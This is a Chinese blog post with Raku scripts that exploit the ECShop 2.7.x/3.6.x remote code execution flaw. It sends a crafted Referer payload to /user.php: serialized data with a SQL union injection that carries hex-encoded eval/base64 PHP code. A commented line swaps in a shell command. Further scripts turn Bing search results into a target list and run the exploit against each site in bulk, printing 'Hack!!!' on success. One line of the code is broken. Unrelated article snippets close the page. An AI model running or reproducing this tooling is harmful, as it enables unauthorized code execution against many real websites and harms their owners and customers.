下面为测试是否存在漏洞的脚本:

sub MAIN($url) {

use HTTP::UserAgent;

my $r = HTTP::Request.new();

$r.uri: $url~'/user.php';

$r.set-method: 'POST';

my $ua = HTTP::UserAgent.new;

$r.add-content("action=login&vulnspy=phpinfo();exit;");

#my %data = :action<login>,'vulnspy' => "`echo 11111 > 1.txt`;exit";

my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';

#$r.header.field(:User-Agent<Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0>);

#$r.header.field(:Accept<text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8>);

#$r.header.field(:Accept-Language<zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3>);

#$r.header.field(:Accept-Encoding<gzip, deflate>);

$r.header.field(Referer => $exp);

$r.header.field(:Content-Type<application/x-www-form-urlencoded>);

#$r.add-form-data(%data);

#say $r.Str;

#exit;

my $html = $ua.request($r);

#say $r.Str;

#say $html.^methods;

if so $html.content ~~ /:i phpinfo/ {say 'True'};

}

为 True 时表示存在漏洞。

关键字查找可以用这个脚本:

必应关键字查找

查找结果后处理 URL 可以用如下脚本:

my $file = open '1.txt', :r;

my $get_url = open 'url.txt', :a;

for $file.lines {

      if not so $_ ~~ /\// {

        .say;

        $get_url.say($_);

        next;

      }

      if  so $_ ~~ /^http/ {

        $_ ~~ /(http.*\/\/.*?)\//;

        my $swap = $/[].Str;

        say $swap;

        $get_url.say($swap);

        next;

      }

      if so $_ ~~ /(.*?)\/.*/ {

        my $swap = $/[].Str;

      say $swap;

      $get_url.say($swap);

    }

}

把以上处理过的文本导入进行批量检测最终脚本为:

use HTTP::UserAgent;

my $r = HTTP::Request.new();

my $file = open 'url.txt', :r;

my $target;

my $ua = HTTP::UserAgent.new;

for $file.lines -> $url {

      $r.clear;#清除所有头信息

      if $url ~~ /^http/ {

        $target = $url~'/user.php';

        $r.uri: $target;

      } else {

        $target = 'http://'~$url~'/user.php';

        $r.uri: $target;

      }

      say 'Check url: '~$target;

      TEST($target);

  }

sub TEST($url) {

    use HTTP::UserAgent;

    my $r = HTTP::Request.new();

    $r.uri: $url~'/user.php';

    $r.set-method: 'POST';

    my $ua = HTTP::UserAgent.new;

    $ua.timeout = ;

    $r.add-content("action=login&vulnspy=phpinfo();exit;");

    my $exp = '554fcae493e564ee0dc75bdf2ebf94caads|a:3:{s:2:"id";s:3:"\'/*";s:3:"num";s:201:"*/ union select 1,0x272F2A,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:4:"name";s:3:"ads";}554fcae493e564ee0dc75bdf2ebf94ca';

    $r.header.field(Referer => $exp);

    $r.header.field(:Content-Type<application/x-www-form-urlencoded>);

    try {

          # code goes in here

          # 如果有东西出错, 脚本会进入到下面的 CATCH block 中

          # 如果什么错误也没有, 那么 CATCH block 会被忽略

                my $html = $ua.request($r);

                #say $r.Str;

                #say $html.^methods;

                if so $html.content ~~ /:i phpinfo/ {

                  say 'Hack!!! ';

                } else {say 'No'}

          CATCH {

              default {

                # 只有抛出异常时, 这儿的代码才会被求值

                say 'Error';

              }

            }

        }

}

注意:

当打印结果为 Error 时, 可能是爬虫出问题, 或者是 url 链接无法打开。如果有这情况请进行手工测试。

漏洞说明链接为:

ECShop <= 2.7.x/3.6.x 全系列版本远程代码执行高危漏洞EXP

ecshop 2.7.x 批量测试的更多相关文章

  1. 批量增加Linux系统账号、重置账号密码、FTP账号批量测试

    批量增加Linux系统账号.重置账号密码是用Linux Shell脚本来做的:批量FTP账号测试是用Python脚本来做的.这些脚本都是读取一个用户名和密码文件,然后基于该用户名密码文件进行自动批量测 ...

  2. 【Pyhon】利用BurpSuite到SQLMap批量测试SQL注入

    前言 通过Python脚本把Burp的HTTP请求提取出来交给SQLMap批量测试,提升找大门户网站SQL注入点的效率. 导出Burp的请求包 配置到Burp的代理后浏览门户站点,Burp会将URL纪 ...

  3. API Studio 5.1.2 版本更新:加入全局搜索、支持批量测试API测试用例、读取代码注解生成文档支持Github与码云等

    最近在EOLINKER的开发任务繁重,许久在博客园没有更新产品动态了,经过这些日子,EOLINKER又有了长足的进步,增加了更多易用的功能,比如加入全局搜索.支持批量测试API测试用例.读取代码注解生 ...

  4. JMeter循环读取CSV文件实现接口批量测试

    首先要理解为什么要进行批量测试,当我们在工作中进行接口测试时,项目的接口肯定不止一个,而是很多很多,而且每个接口都需要进行正确参数,错误参数,参数为空,特殊字符等方式来测试接口是否能够正确返回所需的响 ...

  5. 全网扫描扫描10000端口后的优化脚本&域名列表指定端口的批量测试

    方法一: #coding=utf-8 import urllib2 import threading from time import ctime,sleep print "Start-Ti ...

  6. junit批量测试

    引入一种“测试套件”的概念: package test; import org.junit.Test; public class Test1 { private int value = 1; publ ...

  7. python实例编写(6)--引入unittest测试框架,构造测试集批量测试(以微信统一管理平台为例)

    ---恢复内容开始--- 一.python单元测试实例介绍 unittest框架又叫PyUnit框架,是python的单元测试框架. 先介绍一个普通的单元测试(不用unittest框架)的实例: 首先 ...

  8. linux 批量测试域名返回码脚本

    需求:应用要求覆盖host并测试 1.创建一个host.txt的文件来存放需要修改的host记录 2.过滤出host.txt域名列并新生成一个curl.txt文件 cat host.txt |awk ...

  9. Python大黑阔—url采集+exp验证,带你批量测试

    i春秋作家:大木瓜 前言: 最近几天在整理从各处收集来的各种工具包,大大小小的塞满了十几个G的硬盘,无意间发现了一个好几年前的0day.心血来潮就拿去试了一下,没想到真的还可以用,不过那些站点都已经老 ...

随机推荐

  1. SE Springer小组《Spring音乐播放器》软件需求说明之四

    4 运行环境规定 4.1设备 我们计划完成的音乐软件较小巧,功能并不复杂,在普通笔记本电脑中即可运行,并无特殊硬设备要求. 4.2支持软件 需要用到windows操作系统,用VS编写C/C++代码,还 ...

  2. Mininet安装

    Mininet 安装 根据SDNLAB上的实验进行安装.连接地址 需要注意的是切换到用户目录下进行clone github上的源码. 1.卸载之前安装的Mininet 最好是先到目录下看是否有这些文件 ...

  3. 第二个spring冲刺第7天

    今天因为停电,所以没什么进展,延迟一天工作,今天当作休息

  4. Android实现Service永久驻留

    说实话,这是一种流氓行为.但有些时候又是不得不需要的.比如微信的NotifyReceiver.现在抛开这些伦理的东西不讲,我们只是来看看技术上怎么实现.在后台运行的service有几个途径可以将其停止 ...

  5. Visual Studio 2015的安装和简单的单元测试

    何为单元测试 绝大多数的软件都是由多人合作完成的,大家的工作相互有依赖关系.软件的很多错误都来源于程序员对模块功能的误解.疏忽或不了解其他模块的变化.如何能让自己负责的模块功能的定义尽量的明确,模块内 ...

  6. 3.23日PSP

    工作 类型 日期 开始时间 结束时间 中断时间 净时间 搭hadoop环境(已终止) 技能 3.23 00:00 00:50 0min 50min 看构建之法 学习 3.23 9:30 10:00 3 ...

  7. javascript面向对象系列第五篇——拖拽的实现

    前面的话 在之前的博客中,拖拽的实现使用了面向过程的写法.本文将以面向对象的写法来实现拖拽 写法 <style> .test{height: 50px;width: 50px;backgr ...

  8. vue中的minix

    minix 是个什么东西, 就是混合,把你混合给我 浅显表述就是 你说 : ‘我叫李四’, 我说 : ‘我叫张三’, 然后把你 混合给我, 就成了 我说 : ‘我叫张三我叫李四’, 所有解说都在例子里 ...

  9. IntelliJ IDEA2017 修改缓存文件的路径

    IDEA的缓存文件夹.IntelliJIdea2017.1,存放着IDEA的破解密码,各个项目的缓存,默认是在C盘的用户目录下,目前有1.5G大小.现在想要把它从C盘移出. 在IDEA的安装路径下中, ...

  10. MT【75】考察高斯函数的一道高考压轴题

    解答:答案1,3,4. 这里关于高斯函数$[x]$的一个不等式是需要知道的$x-1<[x]\le x$,具体的: